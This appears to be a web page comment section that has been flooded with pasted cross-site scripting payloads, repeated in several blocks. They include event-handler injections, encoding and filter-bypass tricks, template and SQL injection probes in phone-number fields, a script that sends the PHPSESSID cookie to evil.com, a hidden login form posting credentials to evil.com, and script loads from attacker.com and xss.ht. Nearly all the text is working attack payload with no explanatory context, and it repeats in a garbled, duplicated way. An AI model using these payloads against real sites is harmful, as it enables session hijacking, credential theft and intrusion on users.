<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[document.domain])</script> javascript:alert(document.domain) </Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)> <script>alert(document.head.innerHTML.substr(77, 97, 120));</script> <iframe srcdoc='<body onload=prompt(51)>'> <script>alert(document.domain)</script> <object onerror=javascript:javascript:alert(1)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(document.cookie)&gt;>"> "><u>XSS Vulnerability</u><marquee+onstart='alert(document.cookie)'>XSS <img src="https://brutelogic.com.br/poc.svg" width="500" height="600"> <img/src/oneror=alert(document['domain])> javascript://%0aalert(1) %7B%7Bconstructor.constructor(%27alert(1337)%27)()%7D%7D “><sVg/OnLuFy=”X=y”oNloaD=;1^confirm(1)>/``¹// <script>{onerror=eval}throw'=alert\x281337\x29'</script> <script>throw onerror=alert,'some string',123,'haha'</script> <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script> <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"> xyz"/ng-click="constructor.c X-Forwarded-Host: bing.com"><img src/onerror=alert(4)> %3CA%20HREF%3d%22http%3a%2f%2fevil.com%22%3EClick%20Here%3C%2fA%3E <form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="Load more content"> " <a href=javascript:alert(document.cookie)>ClickMe</a> '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ <math><mtext><table><mglyph><style><![CDATA[</style><img title="]]></mglyph><img	src=1	onerror=alert("Mr_Mian")>"> %3Csvg%20onload=%0Aalert`xss-found`%3E <svg/onload=\u0061lert(String.fromC\u0061rCode(88,83,83))> +91 97xxxx7x7;phone-context=&phone- context=+9739343777 +91 97xxxx7x7;ext=1;ext=2 +91 97xxxx7x7;phone-context=' OR 1=1; - +91 97xxxx7x7;phone-context={{4*4}}{{5+5}} +91 97xxxx7x7;phone-context-burpcollaborator.net this[String.fromCharCode(97, 108, 101, 114, 116)](String.fromCharCode(72, 101, 108, 108, 111, 33)); this["al"+"ert"]`00` this['al\x65rt'].bind(this)('Hello, World!'); +[]["fill"]["constructor"]("alert(0)")(); this['ale\x72t'](0+0); this['al' + 'ert'].call(this, 0 + 0); !function(){ this['al\x65rt'](0 + 0); }(); +self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])// 0..toLocaleString['constructor']`alert(0)`(); foo"><svG/onLoAd=confirm(1337)> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> ">]<img src=x onerror=alert(document.domain)> +9739343777;phone-context=<script>alert(1)</script> "\u003e\u003cimg src=1 onerror=alert(0)\u003e "><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))> <details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) “><sv\u01234\g\u01235/on\u01236load=confirm(1)> "><sv\u01234\g+s\01235\vg+\01236\svg \u01237\/ ----> \/\u01237\/\ ----> /\u01237\/ ----> / On\u01234\load ----> On\u01234\+OnLoAd ----> onload "\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\> VR11=onfocus='`&VR12=`;alert/*&VR13=*/(1)'a='&VR14='autofocus javascript:%61lert(1) javascript:%61lert(1) javascript:%26%2337%26%2354%26%2349lert(1) "AutoFocus/>/OnFocus=top?.["ale"+"rt"](1)/" <a/href=”j	a	v	asc	ri	pt:alert(1)”> <s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/> <</div>script</div>>alert()<</div>/script</div>> <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> ';alert("8")%0D// onload="alert(document.domain) kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x> <SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x> <svg<script> onmou<script>seover</script>="alert('xss')">hii</svg</script>> "><HTML onmouSeovEr=confirm(document.cookie)x> <a style="position: fixed; top: 0; left: 0; z-index: 99999; width: 100%; height: 100%;" onmouseover=alert(1)> <script>const getCookieValue=(name)=>(document.cookie.match("(^|;)\\s*" + name + "\\s*=\\s*([^;]+)")?.pop() || "");fetch("http://evil.com:1337/drop?c=" + getCookieValue("PHPSESSID"))</script> <<script>script>alert(1)<</script>/script> <svg><animatetransform onbegin=print()> %26%2302java%26%23115cript:alert(document.domain) <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e FUZZ"%27"><xmp><p+title%3D"<%2Fxmp><script>alert(document.cookie)<%2Fscript>> #"></div><a href= javascript:alert(document.domain) "onfocus="prompt(document.cookie)"autofocus=” Jorge+Rodriguez-p3axusnf<img/src=});alert() data-';alert('XSS by Jorge')">-<img src onerror="test=’ </base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/<h1><image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src><script> <a href=javascript:alert(8)</a> \u0022\u003c%26quot;%26gt;%26lt;"';}};“></SCRIPT><img src=x onerror=alert(69)>${{7*7}} <p><///style///><span %2F onmousemove='alert(1)'><strong>Click ME</strong></span></p> \"><svg><animate onbegin=prompt(document.cookie) attributeName=x dur=1s> %27;});alert(%27Ramen%27);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 <%s%v%g+%on%l%oad%=c%o%nf%i%rm%(1%)> javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.cookie)\u0022\u003e "><h1/onmouseover=’\u0061lert(1)’> javascript:eval('con'+'fi'+'rm(doument.domain)') %3c%73%76%67%2f%6f%6e%6c%6f%61%64%3d%70%72%6f%6d%70%74%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%3e <button onclick="alert(1)">Click me, please</button> <iframe srcdoc="<script>alert(1)</script>"></iframe> <iframe src="javascript:alert(1)"></iframe> javascript:confirm(1) <a href="javascript:alert(1)">click me</a> javascript://huli.tw/%0aalert(1) javascript:alert@github.com/#:// javascript:alert%28%27Slonser%20was%20here%21%27%29%3B%2F%2F@github.com#;alert(10);://eow5kas78d0wlv0.m.pipedream.net%27 JaVaScRiP%0at:alert(document.domain) <!--><script>alert(1)</script>--> <div><iframe src=https://example.com></iframe></div> <!-- foo="bar--><s>Hi</s>" --> https://assets.matters.news/processed/1080w/embed/test style=animation-name:spinning onanimationstart=alert(1337) <script nonce=a2b5zsa19c>alert(1)</script> <style><a id="</style><img src=x onerror=alert(1)>"></a></style> <svg></p><style><a id="</style><img src=1 onerror=alert(1)>"> <details/open=/Open/href=/data=; ontoggle="(alert)(document.domain) xss"><input%20type=hidden%20oncontentvisibilityautostatechange=alert?.%26lpar;)%20style=content-visibility:auto> Reply Reply as... Cancel
koko kiki Kiko Kikiki 3 Months Ago n_vis=xssx'*$.getScript`//593.xss.ht`//; [size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size] "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"> <inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"> </inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT; "onmouseover="alert(1) \"-alert(2)}// ${alert(3)} "><svg/onload=prompt('Supakiad-S. (m3ez)', document.domain)> <Svg Only=1 Onload="window.location='https://google.com'+document.cookie"> "/><a href="javascript:alert&lp6ar;1)">x</a><div onmouseover='alert&1par;'>div</div><!--<var onmouseover="prompt(2)">on mouse over</var> "><a href="javascript:alert&lp6ar;1)">x</a><div onmouseover='alert&1par;'>div</div><!--<var onmouseover="prompt(2)">on mouse over</var> <SVG/oNIY=1 ONLOAD=confirm(document.domain)> http://example.com%22%22,%7D)%3C/script%3E%3Csvg+onload=confirm(location)%3E "></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> %26%23%78%32%32%3b%26%23%78%33%65%3b%26%23%78%33%63%3b%26%23%78%32%66%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b%26%23%78%33%63%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b%26%23%78%37%30%3b%26%23%78%37%32%3b%26%23%78%36%66%3b%26%23%78%36%64%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%32%38%3b%26%23%78%33%34%3b%26%23%78%32%39%3b%26%23%78%33%63%3b%26%23%78%32%66%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b %25%32%32%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%37%30%25%37%32%25%36%66%25%36%64%25%37%30%25%37%34%25%32%38%25%33%34%25%32%39%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65 <img src=1 onerror=alert(document.domain)> <><img src=1 onerror=alert(3)> {{$on.constructor('alert(4)')()}} javascript:alert(document.cookie) "><svg><animatetransform onbegin=alert(5)> '>"></title></style></textarea></script><script/src=attacker.com/js></script> ?msg=<img/src=`%00`%20onerror=this.onerror=confirm(6) &%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27 &toString().constructor.prototype.charAt%3d[].join;[7]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1 <svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))> <svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))> http://foo?'-alert(8)-' </textarea><ScRiPt>prompt(/hack the planet/)</ScRiPt// 22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E <iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe> %3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27 %22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E%3C/textarea%3E%3CScRiPt%3Eprompt(document.cookie)%3C/ScRiPt// dz7b'-prompt(1)-'nrito <object onerror=javascript:javascript:alert(1)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(document.cookie)&gt;>"> <image src=1 href=1 onerror="javascript:alert(1)"></image> "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie "\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[document.domain])</script> javascript:alert(document.domain) </Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)> <script>alert(document.head.innerHTML.substr(77, 97, 120));</script> <iframe srcdoc='<body onload=prompt(51)>'> <script>alert(document.domain)</script> <object onerror=javascript:javascript:alert(1)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(document.cookie)&gt;>"> "><u>XSS Vulnerability</u><marquee+onstart='alert(document.cookie)'>XSS <img src="https://brutelogic.com.br/poc.svg" width="500" height="600"> <img/src/oneror=alert(document['domain])> javascript://%0aalert(1) %7B%7Bconstructor.constructor(%27alert(1337)%27)()%7D%7D “><sVg/OnLuFy=”X=y”oNloaD=;1^confirm(1)>/``¹// <script>{onerror=eval}throw'=alert\x281337\x29'</script> <script>throw onerror=alert,'some string',123,'haha'</script> <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script> <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"> xyz"/ng-click="constructor.c X-Forwarded-Host: bing.com"><img src/onerror=alert(4)> %3CA%20HREF%3d%22http%3a%2f%2fevil.com%22%3EClick%20Here%3C%2fA%3E <form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="Load more content"> " <a href=javascript:alert(document.cookie)>ClickMe</a> '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ <math><mtext><table><mglyph><style><![CDATA[</style><img title="]]></mglyph><img	src=1	onerror=alert("Mr_Mian")>"> %3Csvg%20onload=%0Aalert`xss-found`%3E <svg/onload=\u0061lert(String.fromC\u0061rCode(88,83,83))> +91 97xxxx7x7;phone-context=&phone- context=+9739343777 +91 97xxxx7x7;ext=1;ext=2 +91 97xxxx7x7;phone-context=' OR 1=1; - +91 97xxxx7x7;phone-context={{4*4}}{{5+5}} +91 97xxxx7x7;phone-context-burpcollaborator.net this[String.fromCharCode(97, 108, 101, 114, 116)](String.fromCharCode(72, 101, 108, 108, 111, 33)); this["al"+"ert"]`00` this['al\x65rt'].bind(this)('Hello, World!'); +[]["fill"]["constructor"]("alert(0)")(); this['ale\x72t'](0+0); this['al' + 'ert'].call(this, 0 + 0); !function(){ this['al\x65rt'](0 + 0); }(); +self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])// 0..toLocaleString['constructor']`alert(0)`(); foo"><svG/onLoAd=confirm(1337)> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> ">]<img src=x onerror=alert(document.domain)> +9739343777;phone-context=<script>alert(1)</script> "\u003e\u003cimg src=1 onerror=alert(0)\u003e "><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))> <details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) “><sv\u01234\g\u01235/on\u01236load=confirm(1)> "><sv\u01234\g+s\01235\vg+\01236\svg \u01237\/ ----> \/\u01237\/\ ----> /\u01237\/ ----> / On\u01234\load ----> On\u01234\+OnLoAd ----> onload "\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\> VR11=onfocus='`&VR12=`;alert/*&VR13=*/(1)'a='&VR14='autofocus javascript:%61lert(1) javascript:%61lert(1) javascript:%26%2337%26%2354%26%2349lert(1) "AutoFocus/>/OnFocus=top?.["ale"+"rt"](1)/" <a/href=”j	a	v	asc	ri	pt:alert(1)”> <s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/> <</div>script</div>>alert()<</div>/script</div>> <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> ';alert("8")%0D// onload="alert(document.domain) kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x> <SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x> <svg<script> onmou<script>seover</script>="alert('xss')">hii</svg</script>> "><HTML onmouSeovEr=confirm(document.cookie)x> <a style="position: fixed; top: 0; left: 0; z-index: 99999; width: 100%; height: 100%;" onmouseover=alert(1)> <script>const getCookieValue=(name)=>(document.cookie.match("(^|;)\\s*" + name + "\\s*=\\s*([^;]+)")?.pop() || "");fetch("http://evil.com:1337/drop?c=" + getCookieValue("PHPSESSID"))</script> <<script>script>alert(1)<</script>/script> <svg><animatetransform onbegin=print()> %26%2302java%26%23115cript:alert(document.domain) <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e FUZZ"%27"><xmp><p+title%3D"<%2Fxmp><script>alert(document.cookie)<%2Fscript>> #"></div><a href= javascript:alert(document.domain) "onfocus="prompt(document.cookie)"autofocus=” Jorge+Rodriguez-p3axusnf<img/src=});alert() data-';alert('XSS by Jorge')">-<img src onerror="test=’ </base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/--><h1/<h1><image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src><script> <a href=javascript:alert(8)</a> \u0022\u003c%26quot;%26gt;%26lt;"';}};“></SCRIPT><img src=x onerror=alert(69)>${{7*7}} <p><///style///><span %2F onmousemove='alert(1)'><strong>Click ME</strong></span></p> \"><svg><animate onbegin=prompt(document.cookie) attributeName=x dur=1s> %27;});alert(%27Ramen%27);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27 <%s%v%g+%on%l%oad%=c%o%nf%i%rm%(1%)> javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie \u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.cookie)\u0022\u003e "><h1/onmouseover=’\u0061lert(1)’> javascript:eval('con'+'fi'+'rm(doument.domain)') %3c%73%76%67%2f%6f%6e%6c%6f%61%64%3d%70%72%6f%6d%70%74%28%64%6f%63%75%6d%65%6e%74%2e%64%6f%6d%61%69%6e%29%3e <button onclick="alert(1)">Click me, please</button> <iframe srcdoc="<script>alert(1)</script>"></iframe> <iframe src="javascript:alert(1)"></iframe> javascript:confirm(1) <a href="javascript:alert(1)">click me</a> javascript://huli.tw/%0aalert(1) javascript:alert@github.com/#:// javascript:alert%28%27Slonser%20was%20here%21%27%29%3B%2F%2F@github.com#;alert(10);://eow5kas78d0wlv0.m.pipedream.net%27 JaVaScRiP%0at:alert(document.domain) <!--><script>alert(1)</script>--> <div><iframe src=https://example.com></iframe></div> <!-- foo="bar--><s>Hi</s>" --> https://assets.matters.news/processed/1080w/embed/test style=animation-name:spinning onanimationstart=alert(1337) <script nonce=a2b5zsa19c>alert(1)</script> <style><a id="</style><img src=x onerror=alert(1)>"></a></style> <svg></p><style><a id="</style><img src=1 onerror=alert(1)>"> <details/open=/Open/href=/data=; ontoggle="(alert)(document.domain) xss"><input%20type=hidden%20oncontentvisibilityautostatechange=alert?.%26lpar;)%20style=content-visibility:auto> Reply Reply as... Cancel
koko kiki 3 Months Ago n_vis=xssx'*$.getScript`//593.xss.ht`//; [size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size] "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"> <inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"> </inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT; "onmouseover="alert(1) \"-alert(2)}// ${alert(3)} "><svg/onload=prompt('Supakiad-S. (m3ez)', document.domain)> <Svg Only=1 Onload="window.location='https://google.com'+document.cookie"> "/><a href="javascript:alert&lp6ar;1)">x</a><div onmouseover='alert&1par;'>div</div><!--<var onmouseover="prompt(2)">on mouse over</var> "><a href="javascript:alert&lp6ar;1)">x</a><div onmouseover='alert&1par;'>div</div><!--<var onmouseover="prompt(2)">on mouse over</var> <SVG/oNIY=1 ONLOAD=confirm(document.domain)> http://example.com%22%22,%7D)%3C/script%3E%3Csvg+onload=confirm(location)%3E "></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> %26%23%78%32%32%3b%26%23%78%33%65%3b%26%23%78%33%63%3b%26%23%78%32%66%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b%26%23%78%33%63%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b%26%23%78%37%30%3b%26%23%78%37%32%3b%26%23%78%36%66%3b%26%23%78%36%64%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%32%38%3b%26%23%78%33%34%3b%26%23%78%32%39%3b%26%23%78%33%63%3b%26%23%78%32%66%3b%26%23%78%37%33%3b%26%23%78%36%33%3b%26%23%78%37%32%3b%26%23%78%36%39%3b%26%23%78%37%30%3b%26%23%78%37%34%3b%26%23%78%33%65%3b %25%32%32%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%37%30%25%37%32%25%36%66%25%36%64%25%37%30%25%37%34%25%32%38%25%33%34%25%32%39%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65 <img src=1 onerror=alert(document.domain)> <><img src=1 onerror=alert(3)> {{$on.constructor('alert(4)')()}} javascript:alert(document.cookie) "><svg><animatetransform onbegin=alert(5)> '>"></title></style></textarea></script><script/src=attacker.com/js></script> ?msg=<img/src=`%00`%20onerror=this.onerror=confirm(6) &%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27 &toString().constructor.prototype.charAt%3d[].join;[7]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1 <svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))> <svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))> http://foo?'-alert(8)-' </textarea><ScRiPt>prompt(/hack the planet/)</ScRiPt// 22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E <iframe src="https://YOUR-LAB-ID.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe> %3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27 %22%3E%3C/script%3E%3Csvg%20onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)%3E%3C/textarea%3E%3CScRiPt%3Eprompt(document.cookie)%3C/ScRiPt// dz7b'-prompt(1)-'nrito <object onerror=javascript:javascript:alert(1)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(document.cookie)&gt;>"> <image src=1 href=1 onerror="javascript:alert(1)"></image> "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie "\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[document.domain])</script> javascript:alert(document.domain) </Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)> <script>alert(document.head.innerHTML.substr(77, 97, 120));</script> <iframe srcdoc='<body onload=prompt(51)>'> <script>alert(document.domain)</script> <object onerror=javascript:javascript:alert(1)> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(2);">]]</C><X></xml> <iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(document.cookie)&gt;>"> "><u>XSS Vulnerability</u><marquee+onstart='alert(document.cookie)'>XSS <img src="https://brutelogic.com.br/poc.svg" width="500" height="600"> <img/src/oneror=alert(document['domain])> javascript://%0aalert(1) %7B%7Bconstructor.constructor(%27alert(1337)%27)()%7D%7D “><sVg/OnLuFy=”X=y”oNloaD=;1^confirm(1)>/``¹// <script>{onerror=eval}throw'=alert\x281337\x29'</script> <script>throw onerror=alert,'some string',123,'haha'</script> <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script> <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> "><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c"> xyz"/ng-click="constructor.c X-Forwarded-Host: bing.com"><img src/onerror=alert(4)> %3CA%20HREF%3d%22http%3a%2f%2fevil.com%22%3EClick%20Here%3C%2fA%3E <form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="Load more content"> " <a href=javascript:alert(document.cookie)>ClickMe</a> '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ <math><mtext><table><mglyph><style><![CDATA[</style><img title="]]></mglyph><img	src=1	onerror=alert("Mr_Mian")>"> %3Csvg%20onload=%0Aalert`xss-found`%3E <svg/onload=\u0061lert(String.fromC\u0061rCode(88,83,83))> +91 97xxxx7x7;phone-context=&phone- context=+9739343777 +91 97xxxx7x7;ext=1;ext=2 +91 97xxxx7x7;phone-context=' OR 1=1; - +91 97xxxx7x7;phone-context={{4*4}}{{5+5}} +91 97xxxx7x7;phone-context-burpcollaborator.net this[String.fromCharCode(97, 108, 101, 114, 116)](String.fromCharCode(72, 101, 108, 108, 111, 33)); this["al"+"ert"]`00` this['al\x65rt'].bind(this)('Hello, World!'); +[]["fill"]["constructor"]("alert(0)")(); this['ale\x72t'](0+0); this['al' + 'ert'].call(this, 0 + 0); !function(){ this['al\x65rt'](0 + 0); }(); +self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])// 0..toLocaleString['constructor']`alert(0)`(); foo"><svG/onLoAd=confirm(1337)> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> ">]<img src=x onerror=alert(document.domain)> +9739343777;phone-context=<script>alert(1)</script> "\u003e\u003cimg src=1 onerror=alert(0)\u003e "><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))> <details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) “><sv\u01234\g\u01235/on\u01236load=confirm(1)> "><sv\u01234\g+s\01235\vg+\01236\svg \u01237\/ ----> \/\u01237\/\ ----> /\u01237\/ ----> / On\u01234\load ----> On\u01234\+OnLoAd ----> onload "\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\> VR11=onfocus='`&VR12=`;alert/*&VR13=*/(1)'a='&VR14='autofocus javascript:%61lert(1) javascript:%61lert(1) javascript:%26%2337%26%2354%26%2349lert(1) "AutoFocus/>/OnFocus=top?.["ale"+"rt"](1)/" <a/href=”j	a	v	asc	ri	pt:alert(1)”> <s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/> <</div>script</div>>alert()<</div>/script</div>> <Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> ';alert("8")%0D// onload="alert(document.domain) kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x> <SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x> <svg<script> 